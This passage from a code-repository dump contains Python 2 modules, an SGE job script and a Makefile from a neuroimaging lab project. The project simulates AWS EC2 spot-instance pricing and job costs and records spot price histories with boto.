frame\ndef spothistory_from_dataframe(csv_file, instance_type, product, av_zone):\n '''\n Function to return a time and price series from a csv dataframe\n\n Parameters\n ----------\n csv_file : string\n file path to dataframe csv file\n instance_type : string\n the type of instance to gather spot history for\n product : string\n the type of OS product to gather spot history for\n av_zone : string\n the availability zone to get the pricing info for\n\n Returns\n -------\n spot_history : pandas.Series\n time series of spot history prices indexed by timestamp\n '''\n\n # Import packages\n import dateutil.parser\n import pandas as pd\n\n # Init variables\n\n # Load data frame\n print 'Loading dataframe %s...' % csv_file\n data_frame = pd.DataFrame.from_csv(csv_file)\n\n # Get only entries we care about\n df_bool = (data_frame['Instance type'] == instance_type) & \\\n (data_frame['Product'] == product) & \\\n (data_frame['Availability zone'] == av_zone)\n df_subset = data_frame[df_bool]\n\n # Get spot histories from data frame with str timestamps\n spot_history = df_subset.set_index('Timestamp')['Spot price']\n spot_history = spot_history.sort_index()\n\n # Get new histories with datetime timestamps\n datetimes = [dateutil.parser.parse(ts) for ts in spot_history.index]\n spot_history = pd.Series(spot_history.values, datetimes)\n\n # Return time series\n return spot_history\n\n\n# Main routine\ndef main(sim_dir, proc_time, num_jobs, jobs_per, in_gb, out_gb, out_gb_dl,\n up_rate, down_rate, bid_ratio, instance_type, av_zone, product,\n csv_file=None):\n '''\n Function to calculate spot instance run statistics based on job\n submission parameters; this function will save the statistics and\n specific spot history in csv dataframes to execution directory\n\n Parameters\n ----------\n sim_dir : string\n base directory where to create the availability zone folders\n for storing the simulation results\n proc_time : float\n the number of minutes a single job of interest takes to run\n num_jobs : integer\n total number of jobs to run to complete job submission\n jobs_per : integer\n the number of jobs to run per node\n in_gb : float\n the total amount of input data for a particular job (in GB)\n out_gb : float\n the total amount of output data from a particular job (in GB)\n out_gb_dl : float\n the total amount of output data to download from EC2 (in GB)\n up_rate : float\n the average upload rate to transfer data to EC2 (in Mb/s)\n down_rate : float\n the average download rate to transfer data from EC2 (in Mb/s)\n bid_ratio : float\n the ratio to average spot history price to set the bid price to\n instance_type : string\n type of instance to run the jobs on and to get spot history for\n av_zone : string\n the AWS EC2 availability zone (sub-region) to get spot history\n from\n product : string\n the type of operating system product to get spot history for\n csv_file : string (optional), default is None\n the filepath to a csv dataframe to get spot history from;\n if not specified, the function will just get the most recent 90\n days worth of spot price history\n\n Returns\n -------\n spot_history : pd.DataFrame object\n in addition to saving this as './spot_history.csv' the\n dataframe can also be returned as an object in memory\n stat_df : pd.DataFrame object\n in addition to saving this as './<info>_stats.csv' the\n dataframe can also be returned as an object in memory\n '''\n\n # Import packages\n import dateutil\n import logging\n import numpy as np\n import os\n import pandas as pd\n import yaml\n\n # Import local packages\n import utils\n from record_spot_price import return_spot_history\n\n # Init variables\n proc_time *= 60.0\n num_nodes = min(np.ceil(float(num_jobs)/jobs_per), 20)\n\n # Init simulation market results dataframe\n sim_df_cols = ['start_time', 'spot_hist_csv', 'proc_time', 'num_datasets',\n 'jobs_per_node', 'num_jobs_iter', 'bid_ratio', 'bid_price',\n 'median_history', 'mean_history', 'stdev_history',\n 'compute_time', 'wait_time', 'per_node_cost',\n 'num_interrupts', 'first_iter_time']\n sim_df = pd.DataFrame(columns=sim_df_cols)\n\n # Init full run stats data frame\n stat_df_cols = ['Total cost', 'Instance cost', 'Storage cost', 'Tranfer cost',\n 'Total time', 'Run time', 'Wait time',\n 'Upload time', 'Download time']\n stat_df = pd.DataFrame(columns=stat_df_cols)\n\n # Set up logger\n base_dir = os.path.join(sim_dir, av_zone)\n if not os.path.exists(base_dir):\n try:\n os.makedirs(base_dir)\n except OSError as exc:\n print 'Found av zone directory %s, continuing...' % av_zone\n log_path = os.path.join(base_dir, '%s_%d-jobs_%.3f-bid.log' % \\\n (instance_type, num_jobs, bid_ratio))\n stat_log = utils.setup_logger('stat_log', log_path, logging.INFO, to_screen=True)\n\n # Check to see if simulation was already run (sim csv file exists)\n sim_csv = os.path.join(base_dir, '%s_%d-jobs_%.3f-bid_sim.csv' % \\\n (instance_type, num_jobs, bid_ratio))\n if os.path.exists(sim_csv):\n stat_log.info('Simulation file %s already exists, skipping...' % sim_csv)\n return\n\n # Calculate number of iterations given run configuration\n # Round up and assume that we're waiting for all jobs to finish\n # before terminating nodes\n num_iter = np.ceil(num_jobs/float((jobs_per*num_nodes)))\n stat_log.info('With %d jobs, %d nodes, and %d jobs running per node...\\n' \\\n 'job iterations: %d' % (num_jobs, num_nodes, jobs_per, num_iter))\n\n # Get spot price history, if we're getting it from a csv dataframe\n if csv_file:\n # Parse dataframe to form history\n spot_history = spothistory_from_dataframe(csv_file, instance_type,\n product, av_zone)\n # Get rid of any duplicated timestamps\n spot_history = spot_history.groupby(spot_history.index).first()\n\n # Otherwise, just grab latest 90 days\n else:\n sh_list = return_spot_history(None, instance_type, product, av_zone)\n\n # Convert history into just timepoints and prices list of tuples\n timestamps = [dateutil.parser.parse(sh.timestamp) for sh in sh_list]\n prices = [sh.price for sh in sh_list]\n\n # Use pandas timeseries and sort in oldest -> newest\n spot_history = pd.Series(prices, timestamps)\n spot_history = spot_history.sort_index()\n\n # Write spot history to disk\n sh_csv = os.path.join(os.getcwd(), 'spot_history.csv')\n spot_history.to_csv(sh_csv)\n\n # Get interpolated times per second (forward fill)\n interp_seq = pd.date_range(spot_history.index[0], spot_history.index[-1],\n freq='S')\n interp_history = spot_history.reindex(interp_seq)\n interp_history = interp_history.fillna(method='ffill')\n\n # Init simulation time series\n sim_seq = pd.date_range(interp_seq[0], interp_seq[-1], freq='20T')\n sim_series = interp_history[sim_seq]\n\n # Init loop variables\n sim_idx = 0\n sim_length = len(sim_series)\n beg_time = spot_history.index[0]\n end_time = spot_history.index[-1]\n time_needed = num_iter*(proc_time)\n\n # Get bid price\n spot_history_avg = interp_history.mean()\n bid_price = bid_ratio*spot_history_avg\n stat_log.info('Spot history average is $%.3f, bid ratio of %.3fx sets ' \\\n 'bid to $%.3f' % (spot_history_avg, bid_ratio, bid_price))\n\n # Iterate through the interpolated timeseries\n for start_time, start_price in sim_series.iteritems():\n # First see if there's enough time to run jobs\n time_window = (end_time-start_time).total_seconds()\n if time_needed > time_window:\n stat_log.info('Total runtime exceeds time window, ending simulation...')\n\n # Simulate running job and get stats from that start time\n try:\n run_time, wait_time, pernode_cost, num_interrupts, first_iter_time = \\\n simulate_market(start_time, spot_history, interp_history,\n proc_time, num_iter, bid_price)\n except Exception as exc:\n stat_log.info('Could not run full simulation because of:\\n%s' % exc)\n continue\n\n # Write simulate market output to dataframe\n sim_df.loc[sim_idx] = [start_time, csv_file, proc_time, num_jobs,\n jobs_per, num_iter, bid_ratio, bid_price,\n np.mean(spot_history), np.median(spot_history),\n np.std(spot_history), run_time, wait_time,\n pernode_cost, num_interrupts, first_iter_time]\n\n # Get complete time and costs from spot market simulation parameters\n total_cost, instance_cost, stor_cost, xfer_cost, \\\n total_time, run_time, wait_time, \\\n xfer_up_time, xfer_down_time = \\\n calc_ebs_model_costs(run_time, wait_time, pernode_cost,\n first_iter_time, num_jobs, num_nodes,\n jobs_per, av_zone, in_gb, out_gb,\n out_gb_dl, up_rate, down_rate)\n\n # Add to output dataframe\n stat_df.loc[sim_idx] = [total_cost, instance_cost, stor_cost, xfer_cost,\n total_time/60.0, run_time/60.0, wait_time/60.0,\n xfer_up_time/60.0, xfer_down_time/60.0]\n\n # Print stats\n stat_log.info('Total cost: $%.3f' % total_cost)\n stat_log.info('Total time (minutes): %.3f' % (total_time/60.0))\n stat_log.info('run time (minutes): %.3f' % (run_time/60.0))\n stat_log.info('per-node cost: $%.3f' % pernode_cost)\n stat_log.info('number of interrupts: %d' % num_interrupts)\n stat_log.info('wait time (minutes): %.3f' % (wait_time/60.0))\n\n sim_idx += 1\n utils.print_loop_status(sim_idx, sim_length)\n\n # Add configuration parameters to dataframe\n sim_df['av_zone'] = av_zone\n sim_df['in_gb'] = in_gb\n sim_df['out_gb'] = out_gb\n sim_df['out_gb_dl'] = out_gb_dl\n sim_df['up_rate'] = up_rate\n sim_df['down_rate'] = down_rate\n\n # Write simulation dataframe to disk\n sim_df.to_csv(sim_csv)\n\n # Write stats dataframe to disk\n stat_csv = os.path.join(base_dir, '%s_%d-jobs_%.3f-bid_stats.csv' % \\\n (instance_type, num_jobs, bid_ratio))\n stat_df.to_csv(stat_csv)\n\n # Write parameters yaml to disk\n params_yml = os.path.join(base_dir, '%s_%d-jobs_%.3f-bid_params.yml' % \\\n (instance_type, num_jobs, bid_ratio))\n\n params = {'proc_time' : proc_time,\n 'num_jobs' : num_jobs,\n 'jobs_per' : jobs_per,\n 'in_gb' : in_gb,\n 'out_gb' : out_gb,\n 'out_gb_dl' : out_gb_dl,\n 'up_rate' : up_rate,\n 'down_rate' : down_rate,\n 'bid_ratio' : bid_ratio,\n 'instance_type' : instance_type,\n 'av_zone' : av_zone,\n 'product' : product,\n 'csv_file' : csv_file}\n\n with open(params_yml, 'w') as y_file:\n y_file.write(yaml.dump(params))\n\n # Give simulation-wide statistics\n interrupt_avg = sim_df['num_interrupts'].mean()\n time_avg = stat_df['Total time'].mean()\n cost_avg = stat_df['Total cost'].mean()\n\n # Print simulation statistics\n stat_log.info('\\n' + 72*'-')\n stat_log.info('Submission of %d job iterations, ' \\\n 'each takes %.3f mins to run:' % (num_iter, proc_time/60.0))\n stat_log.info('Average spot history price for %s in %s\\n' \\\n 'between %s and %s is: $%.3f' % \\\n (instance_type, av_zone, beg_time, end_time, spot_history_avg))\n stat_log.info('Spot ratio of %.3fx the average price set bid to $%.3f' % \\\n (bid_ratio, bid_price))\n stat_log.info('Average total time (mins): %f' % time_avg)\n stat_log.info('Average total cost: $%.3f' % cost_avg)\n stat_log.info('Average number of interruptions: %.3f' % interrupt_avg)\n stat_log.info(72*'-' + '\\n')\n\n # Return dataframes\n return spot_history, sim_df, stat_df\n\n\n# Make executable\nif __name__ == '__main__':\n\n # Import packages\n import argparse\n\n # Init argparser\n parser = argparse.ArgumentParser(description=__doc__)\n\n # Required arguments\n parser.add_argument('-t', '--proc_time', nargs=1, required=True,\n type=float, help='Processing time for one job to complete '\\\n 'successfully (in minutes)')\n parser.add_argument('-j', '--num_jobs', nargs=1, required=True, type=int,\n help='Total number of jobs to run in AWS')\n parser.add_argument('-per', '--jobs_per', nargs=1, required=True, type=int,\n help='Number of jobs to run per node')\n parser.add_argument('-ig', '--in_gb', nargs=1, required=True, type=float,\n help='Input size per job in GB to upload to EC2')\n parser.add_argument('-og', '--out_gb', nargs=1, required=True, type=float,\n help='Output size per job in GB to store in EC2 EBS')\n parser.add_argument('-od', '--out_gb_dl', nargs=1, required=True, type=float,\n help='Output size per job in GB to download from EC2')\n parser.add_argument('-ur', '--up_rate', nargs=1, required=True, type=float,\n help='Upload rate in Mb/sec')\n parser.add_argument('-dr', '--down_rate', nargs=1, required=True, type=float,\n help='Download rate in Mb/sec')\n parser.add_argument('-b', '--bid_ratio', nargs=1, required=True,\n type=float, help='Bid ratio to average spot price')\n parser.add_argument('-i', '--instance_type', nargs=1, required=True,\n type=str, help='Instance type to run the jobs on')\n\n # Optional arguments\n parser.add_argument('-z', '--av_zone', nargs=1, required=False, type=str,\n help='Specify availability zone of interest; ' \\\n 'default is \\'us-east-1b\\'')\n parser.add_argument('-p', '--product', nargs=1, required=False, type=str,\n help='Specify product of interest; ' \\\n 'default is \\'Linux/Unix\\'')\n parser.add_argument('-c', '--csv_file', nargs=1, required=False, type=str,\n help='Specify csv dataframe to parse histories')\n\n # Parse arguments\n args = parser.parse_args()\n\n # Init variables\n # Pipeline config params\n proc_time = args.proc_time[0]\n num_jobs = args.num_jobs[0]\n # Cluster config params\n jobs_per = args.jobs_per[0]\n instance_type = args.instance_type[0]\n # Data in/out to store EBS\n in_gb = args.in_gb[0]\n out_gb = args.out_gb[0]\n # Data transfer\n out_gb_dl = args.out_gb_dl[0]\n up_rate = args.up_rate[0]\n down_rate = args.down_rate[0]\n # Bid ratio\n bid_ratio = args.bid_ratio[0]\n\n # Try and init optional arguments\n try:\n av_zone = args.av_zone[0]\n except TypeError as exc:\n av_zone = 'us-east-1b'\n print 'No availability zone argument found, using %s...' % av_zone\n try:\n product = args.product[0]\n except TypeError as exc:\n product = 'Linux/UNIX'\n print 'No product argument found, using %s...' % product\n try:\n csv_file = args.csv_file[0]\n except TypeError as exc:\n csv_file = None\n print 'No csv dataframe specified, only using latest history...'\n\n # Call main routine\n main(proc_time, num_jobs, jobs_per, in_gb, out_gb, out_gb_dl,\n up_rate, down_rate, bid_ratio, instance_type, av_zone, product,\n csv_file)\n" }, { "alpha_fraction": 0.5932673811912537, "alphanum_fraction": 0.6008155345916748, "avg_line_length": 31.285715103149414, "blob_id": "9146da7988f25381933dcaf7b93241fa20a69295", "content_id": "bf0edf46f0f7709c6fa09bd9e7583620def4a5d4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11526, "license_type": "permissive", "max_line_length": 85, "num_lines": 357, "path": "/spot-model/record_spot_price.py", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# record_spot_price.py\n#\n# Author: Daniel Clark, 2015\n\n'''\nThis module records the spot price from AWS EC2 continuously and saves\nthe information to dataframes as a csv files to an output directory\n\nUsage:\n python record_spot_price.py -o <out_dir> -n <num_cores>\n'''\n\n# Initialize categorical variables for spot price history\ndef init_categories():\n '''\n Function that initializes and returns ec2 instance categories\n\n Parameters\n ----------\n None\n\n Returns\n -------\n instance_types : list\n a list of strings containing the various types of instances\n product_descriptions : list\n a list of strings containing the different ec2 OS products\n '''\n\n # Init variables\n instance_types = ['t2.micro', 't2.small', 't2.medium',\n 'm3.medium', 'm3.large', 'm3.xlarge', 'm3.2xlarge',\n 'c4.large', 'c4.xlarge', 'c4.2xlarge', 'c4.4xlarge',\n 'c4.8xlarge', 'c3.large', 'c3.xlarge', 'c3.2xlarge',\n 'c3.4xlarge', 'c3.8xlarge', 'r3.large', 'r3.xlarge',\n 'r3.2xlarge', 'r3.4xlarge', 'r3.8xlarge',\n 'i2.xlarge', 'i2.2xlarge', 'i2.4xlarge', 'i2.8xlarge',\n 'd2.xlarge', 'd2.2xlarge', 'd2.4xlarge', 'd2.8xlarge',\n 'g2.2xlarge', 'g2.8xlarge']\n product_descriptions = ['Linux/UNIX', 'SUSE Linux',\n 'Linux/UNIX (Amazon VPC)', 'SUSE Linux (Amazon VPC)']\n\n # Return variables\n return instance_types, product_descriptions\n\n\n# Get availability zones\ndef return_av_zones(region):\n '''\n Function to get a list of the availability zones as strings\n\n Parameters\n ----------\n region : boto.regioninfo.RegionInfo object\n the region object to get the zones from\n\n Returns\n -------\n av_zones : list\n a list of strings of the availability zone names\n '''\n\n # Import packages\n import boto\n import boto.ec2\n from CPAC.AWS import fetch_creds\n\n # Init variables\n creds_path = '/home2/dclark/secure-creds/aws-keys/dclark_cmi/dclark_cmi_keys.csv'\n aws_sak, aws_aki = fetch_creds.return_aws_keys(creds_path)\n ec2_conn = boto.connect_ec2(aws_sak, aws_aki, region=region)\n av_zones = ec2_conn.get_all_zones()\n\n # Get names as strings\n av_zones = [str(av_zone.name) for av_zone in av_zones]\n\n # Return list of availability zones\n return av_zones\n\n\n# Return the spot history dataframe for certain categories\ndef return_sh_df(start_time, instance_type, product, region):\n '''\n Function to return the spot prices and timestamps\n '''\n\n # Import packages\n import pandas as pd\n\n # Init variables\n df_cols = ['Instance type', 'Product', 'Region', 'Availability zone',\n 'Spot price', 'Timestamp']\n new_df = pd.DataFrame(columns=df_cols)\n\n # Get spot history\n sh_list = return_spot_history(start_time, instance_type, product, region)\n\n # Populate new dataframe\n for idx, sh_record in enumerate(sh_list):\n df_entry = [str(sh_record.instance_type),\n str(sh_record.product_description),\n str(sh_record.region.name),\n str(sh_record.availability_zone),\n sh_record.price, str(sh_record.timestamp)]\n new_df.loc[idx] = df_entry\n\n # Return new dataframe\n return new_df\n\n\n# Return a list of spot price histories\ndef return_spot_history(start_time, instance_type, product, region):\n '''\n Function to return a list of SpotPriceHistory objects\n\n Parameters\n ----------\n start_time : string\n the start time of interest to begin collecting histories\n instance_type : string\n the type of interest to collect the histories for\n product : string\n the OS product platform to collect histories for\n region : boto.regioninfo.RegionInfo object\n the region object to get the zones from\n\n Returns\n -------\n full_sh_list : list\n a list of boto.ec2.spotpricechistory.SpotPriceHistory objects;\n each object contains price, timestamp, and other information\n '''\n\n # Import packages\n import boto\n import boto.ec2\n import logging\n from boto.exception import BotoServerError\n\n from CPAC.AWS import fetch_creds\n\n # Init variables\n creds_path = '/home2/dclark/secure-creds/aws-keys/dclark_cmi/dclark_cmi_keys.csv'\n full_sh_list = []\n\n # Grab region of interest and connect to ec2 in that region\n aws_sak, aws_aki = fetch_creds.return_aws_keys(creds_path)\n ec2_conn = boto.connect_ec2(aws_sak, aws_aki, region=region)\n\n # Get logger\n sh_log = logging.getLogger('sh_log')\n\n # Iterate over all the availability zones\n av_zones = return_av_zones(region)\n num_zones = len(av_zones)\n for av_idx, av_zone in enumerate(av_zones):\n sh_log.info('Getting history for %d/%d: %s...' \\\n % (av_idx+1, num_zones, av_zone))\n # While the token flag indicates to more data\n token_flg = True\n next_token = None\n while token_flg:\n # Grab batch of histories\n try:\n sh_list = \\\n ec2_conn.get_spot_price_history(start_time=start_time,\n instance_type=instance_type,\n product_description=product,\n availability_zone=av_zone,\n next_token=next_token)\n # Grab next token for next batch of histories\n next_token = sh_list.nextToken\n except BotoServerError as exc:\n sh_log.info('Could not access any further histories.\\nError: %s' \\\n % exc.message)\n token_flg = False\n\n # Update list if it has elements and log\n if len(sh_list) > 0:\n first_ts = str(sh_list[0].timestamp)\n last_ts = str(sh_list[-1].timestamp)\n sh_log.info('Appending to list: %s - %s' % (first_ts, last_ts))\n full_sh_list.extend(sh_list)\n else:\n sh_log.info('Found no spot history in %s, moving on...' % av_zone)\n\n # Check if list is still returning 1000 objects\n if len(sh_list) != 1000:\n token_flg = False\n\n # Return full spot history list\n return full_sh_list\n\n\n# Function to get the spot_history and save to csv dataframe\ndef get_df_and_save(start_time, instance_type, product, region, out_dir):\n '''\n Function to get the dataframe for a particular instance type,\n product, and region starting as far back as possible\n\n Parameters\n ----------\n start_time : string\n the start time of interest to begin collecting histories\n instance_type : string\n the type of interest to collect the histories for\n product : string\n the OS product platform to collect histories for\n region : boto.regioninfo.RegionInfo object\n the region object to get the zones from\n '''\n\n # Import packages\n import datetime\n import logging\n import os\n\n # Init variables\n now_date = datetime.datetime.now()\n log_month = now_date.strftime('%m-%Y')\n\n # Get logger\n sh_log = logging.getLogger('sh_log')\n\n # Check to see if folder needs to be created\n out_csv = os.path.join(out_dir, log_month, str(region.name),\n product.replace('/', '-'),\n instance_type + '.csv')\n if os.path.exists(out_csv):\n sh_log.info('%s already exists, skipping...' % out_csv)\n return\n\n csv_dir = os.path.dirname(out_csv)\n if not os.path.exists(csv_dir):\n os.makedirs(csv_dir)\n\n # Grab the spot history\n df = return_sh_df(start_time, instance_type, product, region)\n\n # Save the dataframe\n df.to_csv(out_csv)\n\n\n# Main routine\ndef main(out_dir, num_cores):\n '''\n Function to fetch the latest spot history from AWS and store in a\n dataframe saved to a local csv file for every availability zone\n\n Parameters\n ----------\n out_dir : string\n base file directory to store the spot history dataframes\n num_cores: integer\n number of cores to use\n '''\n\n # Import packages\n import boto\n import datetime\n import logging\n import os\n import pandas as pd\n from multiprocessing import Process\n from CPAC.AWS import fetch_creds\n\n # Import local packages\n import utils\n\n # Init variables\n proc_list = []\n out_csvs = []\n df_list = []\n creds_path = '/home2/dclark/secure-creds/aws-keys/dclark_cmi/dclark_cmi_keys.csv'\n\n # Set up logger\n now_date = datetime.datetime.now()\n log_month = now_date.strftime('%m-%Y')\n log_path = os.path.join(out_dir, 'spot_history_'+log_month+'.log')\n\n sh_log = utils.setup_logger('sh_log', log_path, logging.INFO, to_screen=True)\n\n # Get list of regions\n aws_sak, aws_aki = fetch_creds.return_aws_keys(creds_path)\n reg_conn = boto.connect_ec2(aws_sak, aws_aki)\n regions = reg_conn.get_all_regions()\n reg_conn.close()\n\n # Init categories to iterate through\n instance_types, product_descriptions = init_categories()\n\n # Form a list of the combinations of instance types and products\n instance_products = [(inst_type, prod) for inst_type in instance_types \\\n for prod in product_descriptions]\n\n # Get total lengths\n reg_len = len(regions)\n ip_len = len(instance_products)\n\n # For each AWS region\n for reg_idx, region in enumerate(regions):\n # For each instance_type-product combination\n for ip_idx, (instance_type, product) in enumerate(instance_products):\n proc = Process(target=get_df_and_save,\n args=(None, instance_type, product, region, out_dir))\n proc_list.append(proc)\n\n # Run in parallel\n utils.run_in_parallel(proc_list, num_cores)\n\n # Gather files to merge into one dataframe\n sh_log.info('Done fetching and saving histories.\\nGathering for merge...')\n for root, dirs, files in os.walk(out_dir):\n if files:\n found_csvs = [os.path.join(root, f) for f in files \\\n if f.endswith('csv')]\n out_csvs.extend(found_csvs)\n\n # Create data frame list\n for csv in out_csvs:\n df_list.append(pd.DataFrame.from_csv(csv))\n\n # Merge dataframes\n sh_log.info('Merging dataframe list...')\n big_df = pd.concat(df_list, ignore_index=True)\n\n # Save to disk\n big_csv = os.path.join(out_dir, 'spot_history_%s.csv' % log_month)\n sh_log.info('Saving data frame to disk as %s' % big_csv)\n big_df.to_csv(big_csv)\n\n\n# Make script executable\nif __name__ == '__main__':\n\n # Import packages\n import argparse\n\n # Init argparser\n parser = argparse.ArgumentParser(description=__doc__)\n\n # Required arguments\n parser.add_argument('-o', '--out_dir', nargs=1, required=True,\n type=str, help='Base directory to store spot '\\\n 'history data frames')\n parser.add_argument('-n', '--num_cores', nargs=1, required=True,\n type=int, help='Number of cores to run in parallel')\n\n # Parse arguments\n args = parser.parse_args()\n\n # Init variables\n out_dir = args.out_dir[0]\n num_cores = args.num_cores[0]\n\n # Run main routine\n main(out_dir, num_cores)\n" }, { "alpha_fraction": 0.6106666922569275, "alphanum_fraction": 0.6213333606719971, "avg_line_length": 25.785715103149414, "blob_id": "e1cdb32296089e8f7bf7f87e2e479a3b7395e43f", "content_id": "a6c535633d2e84b9ff0ad7412395c039e73c63ed", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 375, "license_type": "permissive", "max_line_length": 65, "num_lines": 14, "path": "/data-preproc/scripts/download_run_fs.sge", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "#! /bin/bash\n#$ -cwd\n#$ -S /bin/bash\n#$ -V\n#$ -t 1-50\n#$ -q all.q\n#$ -pe mpi_smp 4\n#$ -e /home/ubuntu/fs_run.err\n#$ -o /home/ubuntu/fs_run.out\nsource /etc/profile.d/cpac_env.sh\necho \"Start - TASKID \" $SGE_TASK_ID \" : \" $(date)\nexport SUBJECTS_DIR=/mnt/subjects\npython /home/ubuntu/work-dir/download_run_fs.py $SGE_TASK_ID /mnt\necho \"End - TASKID \" $SGE_TASK_ID \" : \" $(date)\n" }, { "alpha_fraction": 0.6076555252075195, "alphanum_fraction": 0.6650717854499817, "avg_line_length": 25.125, "blob_id": "da38bd2001e0059f1aff48a30c32698e3fce59cf", "content_id": "1fc67a3f206b759199857a554ba6c99e059ca603", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 209, "license_type": "permissive", "max_line_length": 77, "num_lines": 8, "path": "/poster/Makefile", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "Clark_AWS_OHBM2015.pdf: Clark_AWS_OHBM2015.tex Makefile beamerthemeCMINKI.sty\n\techo \"$< $@\"\n#\tlatex $< \n\tpdflatex $(basename $<) $@\n#\trm $(basename $<).dvi\n\trm $(basename $<).log\n\nall: Clark_AWS_OHBM2015.pdf\n" }, { "alpha_fraction": 0.5823907852172852, "alphanum_fraction": 0.5880122184753418, "avg_line_length": 29.318275451660156, "blob_id": "7ceab7ae51385fcd44a8c9517ed72e1755469286", "content_id": "bc642ac92a6967c6dca7d43febd9118665d1409d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14765, "license_type": "permissive", "max_line_length": 113, "num_lines": 487, "path": "/spot-model/utils.py", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# spot-model/utils.py\n#\n# Author: Daniel Clark, 2015\n\n'''\nThis module contains various utilities for the modules and scripts in\nthis folder or package\n'''\n\n# Apply simulation dataframe\ndef apply_cost_model(sim_df_row):\n '''\n Apply cost model to the simulation results dataframe by row\n\n Parameters\n ----------\n sim_df_row : pandas.Series\n dataframe row from AWS simulation result dataframe\n\n Returns\n -------\n stat_series : pandas.Series\n dataframe series with the configuration, simulation run, and\n costs\n '''\n\n # Import packages\n import numpy as np\n import pandas as pd\n from spot_price_model import calc_s3_model_costs\n\n # Init variables\n run_time = sim_df_row['compute_time']\n wait_time = sim_df_row['wait_time']\n node_cost = sim_df_row['per_node_cost']\n first_iter_time = sim_df_row['first_iter_time']\n num_jobs = sim_df_row['num_datasets']\n jobs_per = sim_df_row['jobs_per_node']\n num_nodes = min(np.ceil(float(num_jobs)/jobs_per), 20)\n av_zone = sim_df_row['av_zone']\n in_gb = sim_df_row['in_gb']\n out_gb = sim_df_row['out_gb']\n up_rate = sim_df_row['up_rate']\n down_rate = sim_df_row['down_rate']\n\n # Grab costs from s3 model\n total_cost, instance_cost, ebs_storage_cost, s3_cost, \\\n s3_storage_cost, s3_req_cost, s3_xfer_cost, \\\n total_time, run_time, wait_time, \\\n xfer_up_time, s3_upl_time, s3_download_time = \\\n calc_s3_model_costs(run_time, wait_time, node_cost, first_iter_time,\n num_jobs, num_nodes, jobs_per, av_zone,\n in_gb, out_gb, up_rate, down_rate)\n\n # Create dictionary\n stat_dict = {'start_time' : sim_df_row['start_time'],\n 'proc_time' : sim_df_row['proc_time'],\n 'num_datasets' : num_jobs,\n 'jobs_per_node' : jobs_per,\n 'num_jobs_iter' : sim_df_row['num_jobs_iter'],\n 'bid_ratio' : sim_df_row['bid_ratio'],\n 'bid_price' : sim_df_row['bid_price'],\n 'median_history' : sim_df_row['median_history'],\n 'mean_history' : sim_df_row['mean_history'],\n 'stdev_history' : sim_df_row['stdev_history'],\n 'run_time' : run_time,\n 'wait_time' : wait_time,\n 'per_node_cost' : node_cost,\n 'num_interrupts' : sim_df_row['num_interrupts'],\n 'first_iter_time' : first_iter_time,\n 'num_nodes' : num_nodes,\n 'av_zone' : av_zone,\n 'in_gb' : in_gb,\n 'up_rate' : up_rate,\n 'down_rate' : down_rate,\n # S3 model costs\n 'total_cost' : total_cost,\n 'instance_cost' : instance_cost,\n 'ebs_storage_cost' : ebs_storage_cost,\n 's3_cost' : s3_cost,\n 's3_storage_cost' : s3_storage_cost,\n 's3_req_cost' : s3_req_cost,\n 's3_xfer_cost' : s3_xfer_cost,\n 'total_time' : total_time,\n 'xfer_up_time' : xfer_up_time,\n 's3_upl_time' : s3_upl_time,\n 's3_download_time' : s3_download_time}\n\n # Convert dict to pandas Series\n stat_series = pd.Series(stat_dict)\n\n # Return new dataframe row\n return stat_series\n\n\n# Add comfig columns to simulation dataframe\ndef add_config_columns(sim_df_csv, cfg_yaml, out_dir):\n '''\n Function to add AWS simulation configuration parameters to the\n simulation dataframe csv generated by the spot_price_model.main()\n function.\n\n Parameters\n ----------\n sim_df_csv : string\n filepath to the siulation dataframe csv; this should be in the\n availability zone folder it was simulated under\n cfg_yaml : string\n filepath to the AWS simulation configuration yaml file that was\n used to launch the simulation\n out_dir : string\n filepath to the base output directory to store the modified\n dataframe\n\n Returns\n -------\n new_df : pandas.DataFrame object\n the updated dataframe\n '''\n\n # Import packages\n import os\n import pandas as pd\n import yaml\n\n # Init variables\n sim_df_csv = os.path.abspath(sim_df_csv)\n av_zone = os.path.dirname(sim_df_csv).split('/')[-1]\n sim_cfg = yaml.load(open(cfg_yaml, 'r'))\n\n # Grab values from config\n in_gb = sim_cfg['in_gb']\n out_gb = sim_cfg['out_gb']\n out_gb_dl = sim_cfg['out_gb_dl']\n up_rate = sim_cfg['up_rate']\n down_rate = sim_cfg['down_rate']\n\n # Load in dataframe\n new_df = pd.DataFrame.from_csv(sim_df_csv)\n\n # Populate new columns\n new_df['av_zone'] = av_zone\n new_df['in_gb'] = in_gb\n new_df['out_gb'] = out_gb\n new_df['out_gb_dl'] = out_gb_dl\n new_df['up_rate'] = up_rate\n new_df['down_rate'] = down_rate\n\n # Save dataframe\n out_csv_dir = os.path.join(out_dir, av_zone)\n if not os.path.exists(out_csv_dir):\n try:\n os.makedirs(out_csv_dir)\n except Exception as err:\n print err\n\n new_df.to_csv(os.path.join(out_csv_dir, os.path.basename(sim_df_csv)))\n\n # Return new dataframe\n return new_df\n\n\n# Build data frame\ndef build_big_df(av_zone_dir):\n '''\n Function to parse and merge the simulation results from the\n *_sim and *_stats files into one big data frame based on the\n availability zone directory provided; it saves this to a csv\n\n Parameters\n ----------\n av_zone_dir : string\n file path to the directory containing the simulation results\n\n Returns\n -------\n big_df : pandas.DatFrame object\n a merged dataframe with all of the stats for the simulation\n '''\n\n # Import packages\n from spot_price_model import spothistory_from_dataframe\n import glob\n import numpy as np\n import os\n import pandas as pd\n\n # Init variables\n df_list = []\n av_zone = av_zone_dir.split('/')[-1]\n csvs = glob.glob(os.path.join(av_zone_dir, '*_stats.csv'))\n\n # Print av zone of interest being created\n print av_zone\n spot_history = spothistory_from_dataframe('spot_history/merged_dfs.csv', 'c3.8xlarge', 'Linux/UNIX', av_zone)\n\n # Iterate through csvs\n for stat_csv in csvs:\n # Get pattern to find sim dataframe\n csv_pattern = stat_csv.split('_stats.csv')[0]\n sim_csv = csv_pattern + 